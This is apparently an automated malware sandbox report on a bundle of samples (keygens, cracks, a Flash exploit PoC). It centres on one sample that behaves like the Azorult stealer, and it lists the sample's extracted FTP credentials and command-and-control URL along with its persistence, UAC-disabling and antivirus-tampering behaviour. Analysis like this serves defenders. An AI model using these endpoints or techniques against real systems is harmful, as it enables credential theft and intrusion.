Overview
overview
10Static
static
81.bin/1.bin.exe
windows7_x64
101.bin/1.bin.exe
windows10_x64
102019-09-02...10.exe
windows7_x64
102019-09-02...10.exe
windows10_x64
1031.exe
windows7_x64
1031.exe
windows10_x64
103DMark 11 ...on.exe
windows7_x64
13DMark 11 ...on.exe
windows10_x64
15da0116af4...18.exe
windows7_x64
85da0116af4...18.exe
windows10_x64
8Archive.zi...3e.exe
windows7_x64
8Archive.zi...3e.exe
windows10_x64
8CVE-2018-1...oC.swf
windows7_x64
3CVE-2018-1...oC.swf
windows10_x64
3CVWSHSetup...1].exe
windows7_x64
3CVWSHSetup...1].exe
windows10_x64
3DiskIntern...en.exe
windows7_x64
1DiskIntern...en.exe
windows10_x64
1ForceOp 2....ce.exe
windows7_x64
10ForceOp 2....ce.exe
windows10_x64
10HYDRA.exe
windows7_x64
10HYDRA.exe
windows10_x64
10Keygen.exe
windows7_x64
10Keygen.exe
windows10_x64
10Lonelyscre...ox.exe
windows7_x64
1Lonelyscre...ox.exe
windows10_x64
1LtHv0O2KZDK4M637.exe
windows7_x64
10LtHv0O2KZDK4M637.exe
windows10_x64
10Magic_File...ja.exe
windows7_x64
1Magic_File...ja.exe
windows10_x64
1OnlineInstaller.exe
windows7_x64
8OnlineInstaller.exe
windows10_x64
8Analysis
-
max time kernel
147s -
max time network
170s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 16:58
Static task
static1
Behavioral task
behavioral1
Sample
1.bin/1.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1.bin/1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
2019-09-02_22-41-10.exe
Resource
win7v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
31.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
3DMark 11 Advanced Edition.exe
Resource
win7v20201028
Behavioral task
behavioral8
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win7v20201028
Behavioral task
behavioral10
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win7v20201028
Behavioral task
behavioral12
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
CVE-2018-15982_PoC.swf
Resource
win7v20201028
Behavioral task
behavioral14
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral15
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win7v20201028
Behavioral task
behavioral16
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win7v20201028
Behavioral task
behavioral18
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win7v20201028
Behavioral task
behavioral20
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
HYDRA.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
Keygen.exe
Resource
win7v20201028
Behavioral task
behavioral24
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win7v20201028
Behavioral task
behavioral26
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
LtHv0O2KZDK4M637.exe
Resource
win7v20201028
Behavioral task
behavioral28
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win7v20201028
Behavioral task
behavioral30
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
OnlineInstaller.exe
Resource
win7v20201028
Behavioral task
behavioral32
Sample
OnlineInstaller.exe
Resource
win10v20201028
General
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll acprotect C:\ProgramData\Windows\vp8encoder.dll acprotect -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Processes:
resource yara_rule C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
taskhost.exeLtHv0O2KZDK4M637.execmd.exedescription ioc process File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts LtHv0O2KZDK4M637.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File created C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe -
Executes dropped EXE 18 IoCs
Processes:
wini.exewinit.exesys.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeRar.exeRDPWInst.exeRDPWInst.exepid process 3032 wini.exe 3304 winit.exe 3028 sys.exe 3860 rutserv.exe 356 rutserv.exe 2616 rutserv.exe 420 rutserv.exe 2928 rfusclient.exe 760 rfusclient.exe 3464 rfusclient.exe 2180 cheat.exe 1968 taskhost.exe 3356 taskhostw.exe 820 R8.exe 3160 winlogon.exe 3848 Rar.exe 4756 RDPWInst.exe 4672 RDPWInst.exe -
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll upx C:\ProgramData\Windows\vp8encoder.dll upx C:\ProgramData\WindowsTask\winlogon.exe upx C:\Programdata\WindowsTask\winlogon.exe upx -
Loads dropped DLL 7 IoCs
Processes:
sys.exesvchost.exepid process 3028 sys.exe 3028 sys.exe 3028 sys.exe 3028 sys.exe 3028 sys.exe 3028 sys.exe 5460 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 5976 icacls.exe 5744 icacls.exe 6136 icacls.exe 5768 icacls.exe 4508 icacls.exe 5520 icacls.exe 5260 icacls.exe 5572 icacls.exe 5824 icacls.exe 5816 icacls.exe 5140 icacls.exe 2860 icacls.exe 1704 icacls.exe 5968 icacls.exe 5668 icacls.exe 5736 icacls.exe 5328 icacls.exe 5584 icacls.exe 5188 icacls.exe 5588 icacls.exe 2132 icacls.exe 5544 icacls.exe 5628 icacls.exe 5492 icacls.exe 4464 icacls.exe 5148 icacls.exe 4336 icacls.exe 5924 icacls.exe 2832 icacls.exe 2192 icacls.exe 5500 icacls.exe 5996 icacls.exe 3824 icacls.exe 6024 icacls.exe 400 icacls.exe 4004 icacls.exe 396 icacls.exe 4620 icacls.exe 5932 icacls.exe 1616 icacls.exe 5216 icacls.exe 4516 icacls.exe 4100 icacls.exe 5200 icacls.exe 5680 icacls.exe 5812 icacls.exe 744 icacls.exe 5152 icacls.exe 2356 icacls.exe 5796 icacls.exe 5472 icacls.exe 4112 icacls.exe 5528 icacls.exe 6060 icacls.exe 5396 icacls.exe 2176 icacls.exe 1560 icacls.exe 5576 icacls.exe 6020 icacls.exe 5904 icacls.exe 1312 icacls.exe 5832 icacls.exe 6064 icacls.exe 5720 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
taskhostw.exeLtHv0O2KZDK4M637.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run LtHv0O2KZDK4M637.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
LtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
LtHv0O2KZDK4M637.exeRDPWInst.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in Program Files directory 31 IoCs
Processes:
attrib.exeattrib.exetaskhost.exeattrib.exeRDPWInst.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files\360\Total Security attrib.exe File opened for modification C:\Program Files\Malwarebytes\Anti-Malware attrib.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\AVAST Software\Avast attrib.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Microsoft JDX taskhost.exe File opened for modification C:\Program Files\ByteFence taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File created C:\Program Files\Common Files\System\iediagcmd.exe taskhost.exe File created C:\Program Files\Common Files\System\iexplore.exe taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files (x86)\Zaxar taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files\ESET attrib.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
taskhost.exeattrib.exedescription ioc process File opened for modification C:\Windows\boy.exe taskhost.exe File created C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\NetworkDistribution taskhost.exe File created C:\Windows\java.exe taskhost.exe File opened for modification C:\Windows\java.exe taskhost.exe File opened for modification C:\WINDOWS\McMwt attrib.exe File created C:\Windows\boy.exe taskhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
sys.exewinit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sys.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sys.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 1028 timeout.exe 4840 timeout.exe 5728 timeout.exe 4156 timeout.exe 1120 timeout.exe 5248 timeout.exe 2208 timeout.exe 2408 timeout.exe 2148 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 4392 ipconfig.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1932 taskkill.exe 1504 taskkill.exe 5240 taskkill.exe 5060 taskkill.exe 2036 taskkill.exe 3412 taskkill.exe -
Modifies registry class 6 IoCs
Processes:
wini.exewinit.exeR8.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
NTFS ADS 2 IoCs
Processes:
taskhostw.exeLtHv0O2KZDK4M637.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ LtHv0O2KZDK4M637.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 1836 regedit.exe 3548 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
LtHv0O2KZDK4M637.exepid process 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe 644 LtHv0O2KZDK4M637.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhostw.exepid process 3356 taskhostw.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 3464 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exedescription pid process Token: SeDebugPrivilege 3860 rutserv.exe Token: SeDebugPrivilege 2616 rutserv.exe Token: SeTakeOwnershipPrivilege 420 rutserv.exe Token: SeTcbPrivilege 420 rutserv.exe Token: SeTcbPrivilege 420 rutserv.exe Token: SeDebugPrivilege 644 LtHv0O2KZDK4M637.exe Token: 9799907557102771160 644 LtHv0O2KZDK4M637.exe Token: 9800291286595393505 644 LtHv0O2KZDK4M637.exe Token: 9800335267068368489 644 LtHv0O2KZDK4M637.exe Token: 9800336366579799654 644 LtHv0O2KZDK4M637.exe Token: 9800337466091755107 644 LtHv0O2KZDK4M637.exe Token: 9800347361702499976 644 LtHv0O2KZDK4M637.exe Token: 9800348461214455429 644 LtHv0O2KZDK4M637.exe Token: 9800380347052775150 644 LtHv0O2KZDK4M637.exe Token: 9800381446564730603 644 LtHv0O2KZDK4M637.exe Token: 9800401237777830165 644 LtHv0O2KZDK4M637.exe Token: 9800414431923917105 644 LtHv0O2KZDK4M637.exe Token: 9800452914833445288 644 LtHv0O2KZDK4M637.exe Token: 9800535378224337031 644 LtHv0O2KZDK4M637.exe Token: 9800543074802782354 644 LtHv0O2KZDK4M637.exe Token: 9800558467972780232 644 LtHv0O2KZDK4M637.exe Token: 9800559567484735685 644 LtHv0O2KZDK4M637.exe Token: 9800569463086567658 644 LtHv0O2KZDK4M637.exe Token: 9800688210497819174 644 LtHv0O2KZDK4M637.exe Token: 9800692608549311034 644 LtHv0O2KZDK4M637.exe Token: 9800699205620519496 644 LtHv0O2KZDK4M637.exe Token: 9800714598781604478 644 LtHv0O2KZDK4M637.exe Token: 9800729991947408020 644 LtHv0O2KZDK4M637.exe Token: 9800738788046197436 644 LtHv0O2KZDK4M637.exe Token: 9800749783164179166 644 LtHv0O2KZDK4M637.exe Token: 9800765176329982708 644 LtHv0O2KZDK4M637.exe Token: 9800769574377278728 644 LtHv0O2KZDK4M637.exe Token: 9800770673889234181 644 LtHv0O2KZDK4M637.exe Token: 9800771773400665346 644 LtHv0O2KZDK4M637.exe Token: 9800775071932337433 644 LtHv0O2KZDK4M637.exe Token: 9800780569491066154 644 LtHv0O2KZDK4M637.exe Token: 9800809156802956668 644 LtHv0O2KZDK4M637.exe Token: 9800810256314912121 644 LtHv0O2KZDK4M637.exe Token: 9800820151920938398 644 LtHv0O2KZDK4M637.exe Token: 9800831147035250080 644 LtHv0O2KZDK4M637.exe Token: 9800832246551399869 644 LtHv0O2KZDK4M637.exe Token: 9800848739224440272 644 LtHv0O2KZDK4M637.exe Token: 9800857535323229688 644 LtHv0O2KZDK4M637.exe Token: 9800861933370526732 644 LtHv0O2KZDK4M637.exe Token: 9800872928484314158 644 LtHv0O2KZDK4M637.exe Token: 9800885023118969933 644 LtHv0O2KZDK4M637.exe Token: 9800891620185459803 644 LtHv0O2KZDK4M637.exe Token: 9800909212378844299 644 LtHv0O2KZDK4M637.exe Token: 9800923506028498084 644 LtHv0O2KZDK4M637.exe Token: 9800927904079989944 644 LtHv0O2KZDK4M637.exe Token: 9800935600662629571 644 LtHv0O2KZDK4M637.exe Token: 9800943297241074926 644 LtHv0O2KZDK4M637.exe Token: 9800996073674428286 644 LtHv0O2KZDK4M637.exe Token: 9800999372214488949 644 LtHv0O2KZDK4M637.exe Token: 9801020262939021244 644 LtHv0O2KZDK4M637.exe Token: 9801038954635972585 644 LtHv0O2KZDK4M637.exe Token: 9801040054147403750 644 LtHv0O2KZDK4M637.exe Token: 9801059845360504336 644 LtHv0O2KZDK4M637.exe Token: 9801062044383890986 644 LtHv0O2KZDK4M637.exe Token: 9801073039506591308 644 LtHv0O2KZDK4M637.exe Token: 81688264704 644 LtHv0O2KZDK4M637.exe Token: 0 644 LtHv0O2KZDK4M637.exe Token: 274877907072 644 LtHv0O2KZDK4M637.exe Token: 0 644 LtHv0O2KZDK4M637.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exeR8.exewinlogon.exepid process 3304 winit.exe 3860 rutserv.exe 356 rutserv.exe 2616 rutserv.exe 420 rutserv.exe 3928 WinMail.exe 3312 WinMail.exe 1968 taskhost.exe 3356 taskhostw.exe 820 R8.exe 3160 winlogon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exesys.execmd.exewinit.exeWinMail.exedescription pid process target process PID 644 wrote to memory of 3032 644 LtHv0O2KZDK4M637.exe wini.exe PID 644 wrote to memory of 3032 644 LtHv0O2KZDK4M637.exe wini.exe PID 644 wrote to memory of 3032 644 LtHv0O2KZDK4M637.exe wini.exe PID 3032 wrote to memory of 1524 3032 wini.exe WScript.exe PID 3032 wrote to memory of 1524 3032 wini.exe WScript.exe PID 3032 wrote to memory of 1524 3032 wini.exe WScript.exe PID 3032 wrote to memory of 3304 3032 wini.exe winit.exe PID 3032 wrote to memory of 3304 3032 wini.exe winit.exe PID 3032 wrote to memory of 3304 3032 wini.exe winit.exe PID 1524 wrote to memory of 1528 1524 WScript.exe cmd.exe PID 1524 wrote to memory of 1528 1524 WScript.exe cmd.exe PID 1524 wrote to memory of 1528 1524 WScript.exe cmd.exe PID 1528 wrote to memory of 1836 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 1836 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 1836 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 3548 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 3548 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 3548 1528 cmd.exe regedit.exe PID 1528 wrote to memory of 2208 1528 cmd.exe timeout.exe PID 1528 wrote to memory of 2208 1528 cmd.exe timeout.exe PID 1528 wrote to memory of 2208 1528 cmd.exe timeout.exe PID 644 wrote to memory of 3028 644 LtHv0O2KZDK4M637.exe sys.exe PID 644 wrote to memory of 3028 644 LtHv0O2KZDK4M637.exe sys.exe PID 644 wrote to memory of 3028 644 LtHv0O2KZDK4M637.exe sys.exe PID 1528 wrote to memory of 3860 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 3860 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 3860 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 356 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 356 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 356 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 2616 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 2616 1528 cmd.exe rutserv.exe PID 1528 wrote to memory of 2616 1528 cmd.exe rutserv.exe PID 420 wrote to memory of 760 420 rutserv.exe rfusclient.exe PID 420 wrote to memory of 760 420 rutserv.exe rfusclient.exe PID 420 wrote to memory of 760 420 rutserv.exe rfusclient.exe PID 420 wrote to memory of 2928 420 rutserv.exe rfusclient.exe PID 420 wrote to memory of 2928 420 rutserv.exe rfusclient.exe PID 420 wrote to memory of 2928 420 rutserv.exe rfusclient.exe PID 1528 wrote to memory of 4032 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 4032 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 4032 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 2164 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 2164 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 2164 1528 cmd.exe attrib.exe PID 1528 wrote to memory of 3916 1528 cmd.exe sc.exe PID 1528 wrote to memory of 3916 1528 cmd.exe sc.exe PID 1528 wrote to memory of 3916 1528 cmd.exe sc.exe PID 1528 wrote to memory of 2240 1528 cmd.exe sc.exe PID 1528 wrote to memory of 2240 1528 cmd.exe sc.exe PID 1528 wrote to memory of 2240 1528 cmd.exe sc.exe PID 1528 wrote to memory of 1544 1528 cmd.exe sc.exe PID 1528 wrote to memory of 1544 1528 cmd.exe sc.exe PID 1528 wrote to memory of 1544 1528 cmd.exe sc.exe PID 3028 wrote to memory of 3124 3028 sys.exe cmd.exe PID 3028 wrote to memory of 3124 3028 sys.exe cmd.exe PID 3028 wrote to memory of 3124 3028 sys.exe cmd.exe PID 3124 wrote to memory of 1028 3124 cmd.exe timeout.exe PID 3124 wrote to memory of 1028 3124 cmd.exe timeout.exe PID 3124 wrote to memory of 1028 3124 cmd.exe timeout.exe PID 3304 wrote to memory of 3928 3304 winit.exe WinMail.exe PID 3304 wrote to memory of 3928 3304 winit.exe WinMail.exe PID 3304 wrote to memory of 3928 3304 winit.exe WinMail.exe PID 3928 wrote to memory of 3312 3928 WinMail.exe WinMail.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
